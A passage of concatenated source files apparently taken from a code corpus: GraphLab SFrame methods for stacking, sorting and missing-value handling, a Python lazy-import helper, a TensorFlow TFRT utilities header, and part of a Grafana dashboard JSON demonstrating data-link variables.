would create a user/friend list for each user/friend pair:
>>> sf = graphlab.SFrame({'topic':[1,2,3],
... 'friends':[[2,3,4], [5,6],
... [4,5,10,None]]
... })
>>> sf
+-------+------------------+
| topic | friends |
+-------+------------------+
| 1 | [2, 3, 4] |
| 2 | [5, 6] |
| 3 | [4, 5, 10, None] |
+----- -+------------------+
[3 rows x 2 columns]
>>> sf.stack('friends', new_column_name='friend')
+------+--------+
| user | friend |
+------+--------+
| 1 | 2 |
| 1 | 3 |
| 1 | 4 |
| 2 | 5 |
| 2 | 6 |
| 3 | 4 |
| 3 | 5 |
| 3 | 10 |
| 3 | None |
+------+--------+
[9 rows x 2 columns]
"""
# validate column_name
column_name = str(column_name)
if column_name not in self.column_names():
raise ValueError("Cannot find column '" + str(column_name) + "' in the SFrame.")
stack_column_type = self[column_name].dtype()
if (stack_column_type not in [dict, array.array, list]):
raise TypeError("Stack is only supported for column of dict/list/array type.")
if (new_column_name != None):
if stack_column_type == dict:
if (type(new_column_name) is not list):
raise TypeError("new_column_name has to be a list to stack dict type")
elif (len(new_column_name) != 2):
raise TypeError("new_column_name must have length of two")
else:
if (type(new_column_name) != str):
raise TypeError("new_column_name has to be a str")
new_column_name = [new_column_name]
# check if the new column name conflicts with existing ones
for name in new_column_name:
if (name in self.column_names()) and (name != column_name):
raise ValueError("Column with name '" + name + "' already exists, pick a new column name")
else:
if stack_column_type == dict:
new_column_name = ["",""]
else:
new_column_name = [""]
# infer column types
head_row = SArray(self[column_name].head(100)).dropna()
if (len(head_row) == 0):
raise ValueError("Cannot infer column type because there is not enough rows to infer value")
if stack_column_type == dict:
# infer key/value type
keys = []; values = []
for row in head_row:
for val in row:
keys.append(val)
if val != None: values.append(row[val])
new_column_type = [
infer_type_of_list(keys),
infer_type_of_list(values)
]
else:
values = [v for v in itertools.chain.from_iterable(head_row)]
new_column_type = [infer_type_of_list(values)]
_mt._get_metric_tracker().track('sframe.stack')
with cython_context():
return SFrame(_proxy=self.__proxy__.stack(column_name, new_column_name, new_column_type, drop_na))
def unstack(self, column, new_column_name=None):
"""
Concatenate values from one or two columns into one column, grouping by
all other columns. The resulting column could be of type list, array or
dictionary. If ``column`` is a numeric column, the result will be of
array.array type. If ``column`` is a non-numeric column, the new column
will be of list type. If ``column`` is a list of two columns, the new
column will be of dict type where the keys are taken from the first
column in the list.
Parameters
----------
column : str | [str, str]
The column(s) that is(are) to be concatenated.
If str, then collapsed column type is either array or list.
If [str, str], then collapsed column type is dict
new_column_name : str, optional
New column name. If not given, a name is generated automatically.
Returns
-------
out : SFrame
A new SFrame containing the grouped columns as well as the new
column.
See Also
--------
stack : The inverse of unstack.
groupby : ``unstack`` is a special version of ``groupby`` that uses the
:mod:`~graphlab.aggregate.CONCAT` aggregator
Notes
-----
- There is no guarantee the resulting SFrame maintains the same order as
the original SFrame.
- Missing values are maintained during unstack.
- When unstacking into a dictionary, if there is more than one instance
of a given key for a particular group, an arbitrary value is selected.
Examples
--------
>>> sf = graphlab.SFrame({'count':[4, 2, 1, 1, 2, None],
... 'topic':['cat', 'cat', 'dog', 'elephant', 'elephant', 'fish'],
... 'word':['a', 'c', 'c', 'a', 'b', None]})
>>> sf.unstack(column=['word', 'count'], new_column_name='words')
+----------+------------------+
| topic | words |
+----------+------------------+
| elephant | {'a': 1, 'b': 2} |
| dog | {'c': 1} |
| cat | {'a': 4, 'c': 2} |
| fish | None |
+----------+------------------+
[4 rows x 2 columns]
>>> sf = graphlab.SFrame({'friend': [2, 3, 4, 5, 6, 4, 5, 2, 3],
... 'user': [1, 1, 1, 2, 2, 2, 3, 4, 4]})
>>> sf.unstack('friend', new_column_name='friends')
+------+-----------------------------+
| user | friends |
+------+-----------------------------+
| 3 | array('d', [5.0]) |
| 1 | array('d', [2.0, 4.0, 3.0]) |
| 2 | array('d', [5.0, 6.0, 4.0]) |
| 4 | array('d', [2.0, 3.0]) |
+------+-----------------------------+
[4 rows x 2 columns]
"""
if (type(column) != str and len(column) != 2):
raise TypeError("'column' parameter has to be either a string or a list of two strings.")
_mt._get_metric_tracker().track('sframe.unstack')
with cython_context():
if type(column) == str:
key_columns = [i for i in self.column_names() if i != column]
if new_column_name != None:
return self.groupby(key_columns, {new_column_name : graphlab.aggregate.CONCAT(column)})
else:
return self.groupby(key_columns, graphlab.aggregate.CONCAT(column))
elif len(column) == 2:
key_columns = [i for i in self.column_names() if i not in column]
if new_column_name != None:
return self.groupby(key_columns, {new_column_name:graphlab.aggregate.CONCAT(column[0], column[1])})
else:
return self.groupby(key_columns, graphlab.aggregate.CONCAT(column[0], column[1]))
    def unique(self):
        """
        Remove duplicate rows of the SFrame. Will not necessarily preserve the
        order of the given SFrame in the new SFrame.

        Returns
        -------
        out : SFrame
            A new SFrame that contains the unique rows of the current SFrame.

        Raises
        ------
        TypeError
            If any column in the SFrame is a dictionary type.

        See Also
        --------
        SArray.unique

        Examples
        --------
        >>> sf = graphlab.SFrame({'id':[1,2,3,3,4], 'value':[1,2,3,3,4]})
        >>> sf
        +----+-------+
        | id | value |
        +----+-------+
        | 1  | 1     |
        | 2  | 2     |
        | 3  | 3     |
        | 3  | 3     |
        | 4  | 4     |
        +----+-------+
        [5 rows x 2 columns]

        >>> sf.unique()
        +----+-------+
        | id | value |
        +----+-------+
        | 2  | 2     |
        | 4  | 4     |
        | 3  | 3     |
        | 1  | 1     |
        +----+-------+
        [4 rows x 2 columns]
        """
        # Grouping by every column with no aggregation operators keeps exactly
        # one row per distinct value combination, which is what removes the
        # duplicates (row order is not preserved by groupby).
        # NOTE(review): the documented TypeError for dict columns presumably
        # comes from dict values not being usable as group keys -- confirm in
        # the groupby implementation.
        return self.groupby(self.column_names(),{})
def sort(self, sort_columns, ascending=True):
"""
Sort current SFrame by the given columns, using the given sort order.
Only columns that are type of str, int and float can be sorted.
Parameters
----------
sort_columns : str | list of str | list of (str, bool) pairs
Names of columns to be sorted. The result will be sorted first by
first column, followed by second column, and so on. All columns will
be sorted in the same order as governed by the `ascending`
parameter. To control the sort ordering for each column
individually, `sort_columns` must be a list of (str, bool) pairs.
Given this case, the first value is the column name and the second
value is a boolean indicating whether the sort order is ascending.
ascending : bool, optional
Sort all columns in the given order.
Returns
-------
out : SFrame
A new SFrame that is sorted according to given sort criteria
See Also
--------
topk
Examples
--------
Suppose 'sf' is an sframe that has three columns 'a', 'b', 'c'.
To sort by column 'a', ascending
>>> sf = graphlab.SFrame({'a':[1,3,2,1],
... 'b':['a','c','b','b'],
... 'c':['x','y','z','y']})
>>> sf
+---+---+---+
| a | b | c |
+---+---+---+
| 1 | a | x |
| 3 | c | y |
| 2 | b | z |
| 1 | b | y |
+---+---+---+
[4 rows x 3 columns]
>>> sf.sort('a')
+---+---+---+
| a | b | c |
+---+---+---+
| 1 | a | x |
| 1 | b | y |
| 2 | b | z |
| 3 | c | y |
+---+---+---+
[4 rows x 3 columns]
To sort by column 'a', descending
>>> sf.sort('a', ascending = False)
+---+---+---+
| a | b | c |
+---+---+---+
| 3 | c | y |
| 2 | b | z |
| 1 | a | x |
| 1 | b | y |
+---+---+---+
[4 rows x 3 columns]
To sort by column 'a' and 'b', all ascending
>>> sf.sort(['a', 'b'])
+---+---+---+
| a | b | c |
+---+---+---+
| 1 | a | x |
| 1 | b | y |
| 2 | b | z |
| 3 | c | y |
+---+---+---+
[4 rows x 3 columns]
To sort by column 'a' ascending, and then by column 'c' descending
>>> sf.sort([('a', True), ('c', False)])
+---+---+---+
| a | b | c |
+---+---+---+
| 1 | b | y |
| 1 | a | x |
| 2 | b | z |
| 3 | c | y |
+---+---+---+
[4 rows x 3 columns]
"""
sort_column_names = []
sort_column_orders = []
# validate sort_columns
if (type(sort_columns) == str):
sort_column_names = [sort_columns]
elif (type(sort_columns) == list):
if (len(sort_columns) == 0):
raise ValueError("Please provide at least one column to sort")
first_param_types = set([type(i) for i in sort_columns])
if (len(first_param_types) != 1):
raise ValueError("sort_columns element are not of the same type")
first_param_type = first_param_types.pop()
if (first_param_type == tuple):
sort_column_names = [i[0] for i in sort_columns]
sort_column_orders = [i[1] for i in sort_columns]
elif(first_param_type == str):
sort_column_names = sort_columns
else:
raise TypeError("sort_columns type is not supported")
else:
raise TypeError("sort_columns type is not correct. Supported types are str, list of str or list of (str,bool) pair.")
# use the second parameter if the sort order is not given
if (len(sort_column_orders) == 0):
sort_column_orders = [ascending for i in sort_column_names]
# make sure all column exists
my_column_names = set(self.column_names())
for column in sort_column_names:
if (type(column) != str):
raise TypeError("Only string parameter can be passed in as column names")
if (column not in my_column_names):
raise ValueError("SFrame has no column named: '" + str(column) + "'")
if (self[column].dtype() not in (str, int, float,datetime.datetime)):
raise TypeError("Only columns of type (str, int, float) can be sorted")
_mt._get_metric_tracker().track('sframe.sort')
with cython_context():
return SFrame(_proxy=self.__proxy__.sort(sort_column_names, sort_column_orders))
    def dropna(self, columns=None, how='any'):
        """
        Remove missing values from an SFrame. A missing value is either ``None``
        or ``NaN``. If ``how`` is 'any', a row will be removed if any of the
        columns in the ``columns`` parameter contains at least one missing
        value. If ``how`` is 'all', a row will be removed if all of the columns
        in the ``columns`` parameter are missing values.

        If the ``columns`` parameter is not specified, the default is to
        consider all columns when searching for missing values.

        Parameters
        ----------
        columns : list or str, optional
            The columns to use when looking for missing values. By default, all
            columns are used.

        how : {'any', 'all'}, optional
            Specifies whether a row should be dropped if at least one column
            has missing values, or if all columns have missing values. 'any' is
            default.

        Returns
        -------
        out : SFrame
            SFrame with missing values removed (according to the given rules).

        See Also
        --------
        dropna_split : Drops missing rows from the SFrame and returns them.

        Examples
        --------
        Drop all missing values.

        >>> sf = graphlab.SFrame({'a': [1, None, None], 'b': ['a', 'b', None]})
        >>> sf.dropna()
        +---+---+
        | a | b |
        +---+---+
        | 1 | a |
        +---+---+
        [1 rows x 2 columns]

        Drop rows where every value is missing.

        >>> sf.dropna(how="all")
        +------+---+
        | a    | b |
        +------+---+
        | 1    | a |
        | None | b |
        +------+---+
        [2 rows x 2 columns]

        Drop rows where column 'a' has a missing value.

        >>> sf.dropna('a', how="all")
        +---+---+
        | a | b |
        +---+---+
        | 1 | a |
        +---+---+
        [1 rows x 2 columns]
        """
        _mt._get_metric_tracker().track('sframe.dropna')

        # If the user gives an empty list (while the *default* empty list sent
        # to the server means "all columns"), dropping NA values over zero
        # columns is a no-op, so don't bother the server.
        if type(columns) is list and len(columns) == 0:
            return SFrame(_proxy=self.__proxy__)

        # Normalize `columns` and translate `how` into the boolean flag the
        # backend expects.
        (columns, all_behavior) = self.__dropna_errchk(columns, how)

        with cython_context():
            # Final False: do not split; return only the rows that survive.
            return SFrame(_proxy=self.__proxy__.drop_missing_values(columns, all_behavior, False))
def dropna_split(self, columns=None, how='any'):
"""
Split rows with missing values from this SFrame. This function has the
same functionality as :py:func:`~graphlab.SFrame.dropna`, but returns a
tuple of two SFrames. The first item is the expected output from
:py:func:`~graphlab.SFrame.dropna`, and the second item contains all the
rows filtered out by the `dropna` algorithm.
Parameters
----------
columns : list or str, optional
The columns to use when looking for missing values. By default, all
columns are used.
how : {'any', 'all'}, optional
Specifies whether a row should be dropped if at least one column
has missing values, or if all columns have missing values. 'any' is
default.
Returns
-------
out : (SFrame, SFrame)
(SFrame with missing values removed,
SFrame with the removed missing values)
See Also
--------
dropna
Examples
--------
>>> sf = graphlab.SFrame({'a': [1, None, None], 'b': ['a', 'b', None]})
>>> good, bad = sf.dropna_split()
>>> good
+---+---+
| a | b |
+---+---+
| 1 | a |
+---+---+
[1 rows x 2 columns]
>>> bad
+------+------+
| a | b |
+------+------+
| None | b |
| None | None |
+------+------+
[2 rows x 2 columns]
"""
_mt._get_metric_tracker().track('sframe.dropna_split')
# If the user gives me an empty list (the indicator to use all columns)
# NA values being dropped would not be the expected behavior. This
# is a NOOP, so let's not bother the server
if type(columns) is list and len(columns) == 0:
return (SFrame(_proxy=self.__proxy__), SFrame())
(columns, all_behavior) = self.__dropna_errchk(columns, how)
sframe_tuple = self.__proxy__.drop_missing_values(columns, all_behavior, True)
if len(sframe_tuple) != 2:
raise RuntimeError("Did not return two SFrames!")
with cython_context():
return (SFrame(_proxy=sframe_tuple[0]), SFrame(_proxy=sframe_tuple[1]))
def __dropna_errchk(self, columns, how):
if columns is None:
# Default behavior is to consider every column, specified to
# the server by an empty list (to avoid sending all the column
# in this case, since it is the most common)
columns = list()
elif type(columns) is str:
columns = [columns]
elif type(columns) is not list:
raise TypeError("Must give columns as a list, str, or 'None'")
else:
# Verify that we are only passing strings in our list
list_types = set([type(i) for i in columns])
if (str not in list_types) or (len(list_types) > 1):
raise TypeError("All columns must be of 'str' type")
if how not in ['any','all']:
raise ValueError("Must specify 'any' or 'all'")
if how == 'all':
all_behavior = True
else:
all_behavior = False
return (columns, all_behavior)
def fillna(self, column, value):
"""
Fill all missing values with a given value in a given column. If the
``value`` is not the same type as the values in ``column``, this method
attempts to convert the value to the original column's type. If this
fails, an error is raised.
Parameters
----------
column : str
The name of the column to modify.
value : type convertible to SArray's type
The value used to replace all missing values.
Returns
-------
out : SFrame
A new SFrame with the specified value in place of missing values.
See Also
--------
dropna
Examples
--------
>>> sf = graphlab.SFrame({'a':[1, None, None],
... 'b':['13.1', '17.2', None]})
>>> sf = sf.fillna('a', 0)
>>> sf
+---+------+
| a | b |
+---+------+
| 1 | 13.1 |
| 0 | 17.2 |
| 0 | None |
+---+------+
[3 rows x 2 columns]
"""
# Normal error checking
if type(column) is not str:
raise TypeError("Must give column name as a str")
ret = self[self.column_names()]
ret[column] = ret[column].fillna(value)
return ret
def add_row_number(self, column_name='id', start=0):
"""
Returns a new SFrame with a new column that numbers each row
sequentially. By default the count starts at 0, but this can be changed
to a positive or negative number. The new column will be named with
the given column name. An error will be raised if the given column
name already exists in the SFrame.
Parameters
----------
column_name : str, optional
The name of the new column that will hold the row numbers.
start : int, optional
The number used to start the row number count.
Returns
-------
out : SFrame
The new SFrame with a column name
Notes
-----
The range of numbers is constrained by a signed 64-bit integer, so
beware of overflow if you think the results in the row number column
will be greater than 9 quintillion.
Examples
--------
>>> sf = graphlab.SFrame({'a': [1, None, None], 'b': ['a', 'b', None]})
>>> sf.add_row_number()
+----+------+------+
| id | a | b |
+----+------+------+
| 0 | 1 | a |
| 1 | None | b |
| 2 | None | None |
+----+------+------+
[3 rows x 3 columns]
"""
_mt._get_metric_tracker().track('sframe.add_row_number')
if type(column_name) is not str:
raise TypeError("Must give column_name as strs")
if type(start) is not int:
raise TypeError("Must give start as int")
if column_name in self.column_names():
raise RuntimeError("Column '" + column_name + "' already exists in the current SFrame")
the_col = _create_sequential_sarray(self.num_rows(), start)
# Make sure the row number column is the first column
new_sf = SFrame()
new_sf.add_column(the_col, column_name)
new_sf.add_columns(self)
return new_sf
    @property
    def shape(self):
        """
        The shape of the SFrame, in a tuple. The first entry is the number of
        rows, the second is the number of columns.

        Examples
        --------
        >>> sf = graphlab.SFrame({'id':[1,2,3], 'val':['A','B','C']})
        >>> sf.shape
        (3, 2)
        """
        return (self.num_rows(), self.num_cols())
    @property
    def __proxy__(self):
        # The UnitySFrameProxy object backing this SFrame (see the matching
        # setter, which asserts the proxy type).
        return self._proxy
@__proxy__.setter
def __proxy__(self, value):
assert type(value) is UnitySFrameProxy
self._proxy = value | unknown | codeparrot/codeparrot-clean | ||
import importlib
def relative_import(parent_name, rel_modules=(), rel_classes=()):
    """
    Build lazy-import machinery (PEP 562) for a package in Python 3.7+.

    Parameters
    ----------
    parent_name : str
        Name of the package on whose behalf the relative imports run.
    rel_modules: list of str
        list of submodules to import, of the form .submodule
    rel_classes: list of str
        list of submodule classes/variables to import, of the form ._submodule.Foo

    Returns
    -------
    tuple
        Tuple that should be assigned to __all__, __getattr__ in the caller
    """
    # Map each exported name to the relative path it is loaded from.
    submodule_by_name = {path.split(".")[-1]: path for path in rel_modules}
    attr_path_by_name = {path.split(".")[-1]: path for path in rel_classes}

    def __getattr__(import_name):
        # Lazily import a submodule on first attribute access.
        if import_name in submodule_by_name:
            return importlib.import_module(submodule_by_name[import_name], parent_name)

        # Lazily import the owning submodule, then pull out the attribute.
        if import_name in attr_path_by_name:
            parts = attr_path_by_name[import_name].split(".")
            owner = importlib.import_module(".".join(parts[:-1]), parent_name)
            return getattr(owner, import_name)

        raise AttributeError(
            "module {__name__!r} has no attribute {name!r}".format(
                name=import_name, __name__=parent_name
            )
        )

    __all__ = list(submodule_by_name) + list(attr_path_by_name)

    def __dir__():
        return __all__

    return __all__, __getattr__, __dir__
/* Copyright 2021 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_CORE_TFRT_UTILS_UTILS_H_
#define TENSORFLOW_CORE_TFRT_UTILS_UTILS_H_
#include <cstdint>
#include <memory>
#include <string>
#include <vector>
#include "absl/status/status.h"
#include "tensorflow/core/framework/types.pb.h"
#include "tensorflow/core/lib/gtl/array_slice.h"
#include "tensorflow/core/platform/errors.h"
#include "tensorflow/core/platform/statusor.h"
#include "tensorflow/core/platform/strcat.h"
#include "tensorflow/core/tfrt/runtime/runtime.h"
#include "tfrt/bef/bef_buffer.h" // from @tf_runtime
#include "tfrt/dtype/dtype.h" // from @tf_runtime
#include "tfrt/support/forward_decls.h" // from @tf_runtime
namespace tensorflow {
class Device;
}  // namespace tensorflow

namespace tfrt {

// Forward declarations; full definitions live in the TFRT headers.
class BEFFile;
class ExecutionContext;
class HostContext;

// Small, inline-storage containers of TFRT dtypes (4 elements inline).
typedef absl::InlinedVector<tfrt::DType, 4UL> TfrtDataTypeVector;
typedef absl::Span<const tfrt::DType> TfrtDataTypeSlice;

// Converts a TensorFlow DataType into the corresponding TFRT DType.
DType ConvertTfDTypeToTfrtDType(tensorflow::DataType dtype);

// Runs the runtime initialization function. A runtime initialization function
// is added by runtime/compiler workflow and is not present in the original
// savedmodel.
//
// TODO(b/178714905): We should avoid special handling on initialization by
// letting compiler to handle it.
absl::Status RunRuntimeInitializer(const tfrt::ExecutionContext& exec_ctx,
                                   tfrt::BEFFile* bef_file,
                                   absl::string_view fallback_init_func);

// Creates dummy TF devices from the input device names. Currently this method
// is used to create the TPU_SYSTEM device for worker server.
void CreateDummyTfDevices(
    const std::vector<std::string>& device_names,
    std::vector<std::unique_ptr<tensorflow::Device>>* dummy_tf_devices);

// Creates and add dummy TFRT devices from the input device names. Currently
// this method is used to create the TPU_SYSTEM device for worker server.
void AddDummyTfrtDevices(const std::vector<std::string>& device_names,
                         tfrt::HostContext* host_ctx);

// Creates a BEF file from a BEF buffer. `runtime` is used to provide host
// context for opening `bef`.
absl::StatusOr<RCReference<tfrt::BEFFile>> CreateBefFileFromBefBuffer(
    const tensorflow::tfrt_stub::Runtime& runtime, const tfrt::BefBuffer& bef);

// Returns a unique integer within this process.
int64_t GetUniqueInt();

// Returns current CPU time.
uint64_t GetCpuClockCycle();

// A list of macros similar to `TF_RETURN_IF_ERROR`, with additional model
// loading stage info prepended to the error message.

#define RETURN_IF_ERROR_IN_IMPORT(...) \
  RETURN_IF_ERROR_WITH_STAGE_INFO("GraphDef proto -> MLIR", __VA_ARGS__)

#define RETURN_IF_ERROR_IN_COMPILE(...)                                       \
  RETURN_IF_ERROR_WITH_STAGE_INFO(                                            \
      "TF dialect -> TFRT dialect, compiler issue, please contact the TFRT " \
      "team",                                                                 \
      __VA_ARGS__)

#define RETURN_IF_ERROR_IN_INIT(...) \
  RETURN_IF_ERROR_WITH_STAGE_INFO("Initialize TFRT", __VA_ARGS__)

// Evaluates the expression; on failure returns the status with "<stage>: "
// prefixed to its message.
#define RETURN_IF_ERROR_WITH_STAGE_INFO(stage, ...)                       \
  do {                                                                    \
    ::tensorflow::Status _status = (__VA_ARGS__);                         \
    if (TF_PREDICT_FALSE(!_status.ok())) {                                \
      return ::tensorflow::errors::CreateWithUpdatedMessage(              \
          _status,                                                        \
          ::tensorflow::strings::StrCat(stage, ": ", _status.message())); \
    }                                                                     \
  } while (0)

// A list of macros similar to `TF_ASSIGN_OR_RETURN`, with additional model
// loading stage info prepended to the error message.

#define ASSIGN_OR_RETURN_IN_IMPORT(lhs, rexpr) \
  ASSIGN_OR_RETURN_WITH_STAGE_INFO("GraphDef proto -> MLIR", lhs, rexpr)

#define ASSIGN_OR_RETURN_IN_COMPILE(lhs, rexpr)                               \
  ASSIGN_OR_RETURN_WITH_STAGE_INFO(                                           \
      "TF dialect -> TFRT dialect, compiler issue, please contact the TFRT " \
      "team",                                                                 \
      lhs, rexpr)

#define ASSIGN_OR_RETURN_IN_INIT(lhs, rexpr) \
  ASSIGN_OR_RETURN_WITH_STAGE_INFO("Initialize TFRT", lhs, rexpr)

// Generates a unique temporary name for the StatusOr via __COUNTER__ so
// nested uses in one scope do not collide.
#define ASSIGN_OR_RETURN_WITH_STAGE_INFO(stage, lhs, rexpr)                    \
  ASSIGN_OR_RETURN_WITH_STAGE_INFO_IMPL(                                       \
      TF_STATUS_MACROS_CONCAT_NAME(_status_or_value, __COUNTER__), stage, lhs, \
      rexpr)

#define ASSIGN_OR_RETURN_WITH_STAGE_INFO_IMPL(statusor, stage, lhs, rexpr)  \
  auto statusor = (rexpr);                                                  \
  if (TF_PREDICT_FALSE(!statusor.ok())) {                                   \
    const auto& _status = statusor.status();                                \
    return ::tensorflow::errors::CreateWithUpdatedMessage(                  \
        _status,                                                            \
        ::tensorflow::strings::StrCat(stage, ": ", _status.message()));     \
  }                                                                         \
  lhs = std::move(statusor.value())

}  // namespace tfrt
#endif // TENSORFLOW_CORE_TFRT_UTILS_UTILS_H_ | c | github | https://github.com/tensorflow/tensorflow | tensorflow/core/tfrt/utils/utils.h |
{
"annotations": {
"list": [
{
"builtIn": 1,
"datasource": {
"uid": "-- Grafana --"
},
"enable": true,
"hide": true,
"iconColor": "rgba(0, 211, 255, 1)",
"name": "Annotations \u0026 Alerts",
"type": "dashboard"
}
]
},
"editable": true,
"fiscalYearStartMonth": 0,
"graphTooltip": 0,
"links": [],
"panels": [
{
"content": "## Data link variables overview\n\nThis dashboard presents variables that one can use when creating *data links*. All links redirect to this dashboard and this panel represents the values that were interpolated in the link that was clicked.\n\n\n#### Series variables\n1. **Name:** \u003cspan style=\"color: orange;\"\u003e$seriesName\u003c/span\u003e\n2. **label.datacenter:** \u003cspan style=\"color: orange;\"\u003e$labelDatacenter\u003c/span\u003e\n3. **label.datacenter.region:** \u003cspan style=\"color: orange;\"\u003e$labelDatacenterRegion\u003c/span\u003e\n\n#### Field variables\n1. **Name:** \u003cspan style=\"color: orange;\"\u003e$fieldName\u003c/span\u003e\n\n#### Value variables\n1. **Time:** \u003cspan style=\"color: orange;\"\u003e$valueTime\u003c/span\u003e\n2. **Numeric:** \u003cspan style=\"color: orange;\"\u003e$valueNumeric\u003c/span\u003e\n3. **Text:** \u003cspan style=\"color: orange;\"\u003e$valueText\u003c/span\u003e\n4. **Calc:** \u003cspan style=\"color: orange;\"\u003e$valueCalc\u003c/span\u003e\n\n",
"datasource": {
"apiVersion": "v1",
"type": "grafana-testdata-datasource",
"uid": "testdata-type-uid"
},
"gridPos": {
"h": 16,
"w": 6,
"x": 0,
"y": 0
},
"id": 8,
"mode": "markdown",
"targets": [
{
"datasource": {
"apiVersion": "v1",
"type": "grafana-testdata-datasource",
"uid": "testdata-type-uid"
},
"refId": "A"
}
],
"transparent": true,
"type": "text"
},
{
"aliasColors": {},
"autoMigrateFrom": "graph",
"bars": false,
"dashLength": 10,
"dashes": false,
"datasource": {
"apiVersion": "v1",
"type": "grafana-testdata-datasource",
"uid": "testdata-type-uid"
},
"fill": 1,
"fillGradient": 0,
"gridPos": {
"h": 8,
"w": 9,
"x": 6,
"y": 0
},
"id": 2,
"legend": {
"avg": false,
"current": false,
"max": false,
"min": false,
"show": true,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"nullPointMode": "null",
"options": {
"dataLinks": [
{
"targetBlank": false,
"title": "Drill it down",
"url": "/d/wfTJJL5Wz/datalinks-source?var-seriesName=${__series.name}\u0026var-labelDatacenter=${__field.labels.datacenter}\u0026var-labelDatacenterRegion=${__field.labels[\"datacenter.region\"]}\u0026var-valueTime=${__value.time}\u0026var-valueNumeric=${__value.numeric}\u0026var-valueText=${__value.text}"
}
]
},
"percentage": false,
"pointradius": 2,
"points": false,
"renderer": "flot",
"seriesOverrides": [],
"spaceLength": 10,
"stack": false,
"steppedLine": false,
"targets": [
{
"alias": "Foo datacenter",
"datasource": {
"apiVersion": "v1",
"type": "grafana-testdata-datasource",
"uid": "testdata-type-uid"
},
"labels": "datacenter=foo,datacenter.region=us-east-1",
"refId": "A",
"scenarioId": "random_walk"
},
{
"alias": "Bar datacenter",
"datasource": {
"apiVersion": "v1",
"type": "grafana-testdata-datasource",
"uid": "testdata-type-uid"
},
"labels": "datacenter=bar,datacenter.region=us-east-2",
"refId": "B",
"scenarioId": "random_walk"
}
],
"thresholds": [],
"timeRegions": [],
"title": "Multiple series",
"tooltip": {
"shared": true,
"sort": 0,
"value_type": "individual"
},
"type": "timeseries",
"xaxis": {
"mode": "time",
"show": true,
"values": []
},
"yaxes": [
{
"format": "short",
"logBase": 1,
"show": true
},
{
"format": "short",
"logBase": 1,
"show": true
}
],
"yaxis": {
"align": false
}
},
{
"aliasColors": {},
"autoMigrateFrom": "graph",
"bars": false,
"dashLength": 10,
"dashes": false,
"datasource": {
"apiVersion": "v1",
"type": "grafana-testdata-datasource",
"uid": "testdata-type-uid"
},
"fill": 1,
"fillGradient": 0,
"gridPos": {
"h": 8,
"w": 9,
"x": 15,
"y": 0
},
"id": 9,
"legend": {
"avg": false,
"current": false,
"max": false,
"min": false,
"show": true,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"nullPointMode": "null",
"options": {
"dataLinks": [
{
"targetBlank": false,
"title": "Drill it down",
"url": "/d/wfTJJL5Wz/datalinks-source?var-seriesName=${__series.name}\u0026var-valueTime=${__value.time}\u0026var-valueNumeric=${__value.numeric}\u0026var-valueText=${__value.text}\u0026var-fieldName=${__field.name}"
}
]
},
"percentage": false,
"pointradius": 2,
"points": false,
"renderer": "flot",
"seriesOverrides": [],
"spaceLength": 10,
"stack": false,
"steppedLine": false,
"targets": [
{
"alias": "Foo datacenter",
"datasource": {
"apiVersion": "v1",
"type": "grafana-testdata-datasource",
"uid": "testdata-type-uid"
},
"labels": "datacenter=foo,datacenter.region=us-east-1",
"refId": "A",
"scenarioId": "random_walk_table",
"stringInput": ""
}
],
"thresholds": [],
"timeRegions": [],
"title": "Multiple fields",
"tooltip": {
"shared": true,
"sort": 0,
"value_type": "individual"
},
"type": "timeseries",
"xaxis": {
"mode": "time",
"show": true,
"values": []
},
"yaxes": [
{
"format": "short",
"logBase": 1,
"show": true
},
{
"format": "short",
"logBase": 1,
"show": true
}
],
"yaxis": {
"align": false
}
},
{
"datasource": {
"uid": "-- Dashboard --"
},
"gridPos": {
"h": 8,
"w": 9,
"x": 6,
"y": 8
},
"id": 6,
"options": {
"displayMode": "lcd",
"fieldOptions": {
"calcs": [
"last"
],
"defaults": {
"links": [
{
"targetBlank": true,
"title": "Drill it down!",
"url": "/d/wfTJJL5Wz/datalinks-source\n?var-fieldName=${__field.name}\n\u0026var-labelDatacenter=${__field.labels.datacenter}\n\u0026var-labelDatacenterRegion=${__field.labels[\"datacenter.region\"]}\n\u0026var-valueNumeric=${__value.numeric}\n\u0026var-valueText=${__value.text}\n\u0026var-valueCalc=${__value.calc}"
}
],
"mappings": [
{
"id": 0,
"op": "=",
"text": "N/A",
"type": 1,
"value": "null"
}
],
"max": 100,
"min": 0,
"nullValueMode": "connected",
"thresholds": [
{
"color": "green"
},
{
"color": "red",
"value": 80
}
],
"title": "${__series.name} - $__calc",
"unit": "none"
},
"override": {},
"values": false
},
"orientation": "horizontal"
},
"pluginVersion": "6.4.0-pre",
"targets": [
{
"datasource": {
"uid": "-- Dashboard --"
},
"panelId": 2,
"refId": "A"
}
],
"title": "Value reducers 1",
"type": "bargauge"
},
{
"datasource": {
"uid": "-- Dashboard --"
},
"gridPos": {
"h": 8,
"w": 9,
"x": 15,
"y": 8
},
"id": 4,
"options": {
"fieldOptions": {
"calcs": [
"mean"
],
"defaults": {
"links": [
{
"title": "Drill it down",
"url": "/d/wfTJJL5Wz/datalinks-source?var-fieldName=${__field.name}\u0026var-labelDatacenter=${__field.labels.datacenter}\u0026var-labelDatacenterRegion=${__field.labels[\"datacenter.region\"]}\u0026var-valueNumeric=${__value.numeric}\u0026var-valueText=${__value.text}\u0026var-valueCalc=${__value.calc}"
}
],
"mappings": [],
"max": 100,
"min": 0,
"thresholds": [
{
"color": "green"
},
{
"color": "red",
"value": 80
}
],
"title": "${__series.name} - $__calc"
},
"override": {},
"values": false
},
"orientation": "auto",
"showThresholdLabels": false,
"showThresholdMarkers": true
},
"pluginVersion": "6.4.0-pre",
"targets": [
{
"datasource": {
"uid": "-- Dashboard --"
},
"panelId": 2,
"refId": "A"
}
],
"title": "Value reducers 2",
"type": "gauge"
}
],
"refresh": "",
"schemaVersion": 42,
"tags": [
"gdev",
"templating"
],
"templating": {
"list": [
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"label": "Series name",
"name": "seriesName",
"options": [
{
"text": "",
"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
},
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"name": "labelDatacenter",
"options": [
{
"text": "",
